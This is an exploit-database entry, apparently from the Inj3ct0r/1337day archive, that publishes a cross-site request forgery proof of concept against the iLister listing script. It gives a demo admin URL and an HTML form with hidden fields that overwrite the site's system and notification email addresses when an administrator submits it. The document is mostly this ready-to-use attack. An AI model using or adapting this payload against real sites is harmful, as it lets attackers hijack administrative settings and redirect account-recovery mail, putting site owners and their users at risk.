# Exploit Title: iLister Multi-Purpose Listing CSRF # Author: Jonturk75 # Vendor or Software Link: http://www.scripts.com/viewscript/ilister-multipurpose-listing-script/23352/ # Category:: webapps # Demo : http://demo.worksforweb.com/iLister/admin # Greetz: Inj3ct0r Exploit DataBase 1337day.com <form action="target.com/[PATH]/settings"> <input type="hidden" value="mail@mail.com" name="system_email" size="40"/> <input type="hidden" value="mail@mail.com" name="notification_email" size="40"/> <input type="submit" value="Save" class="button"/>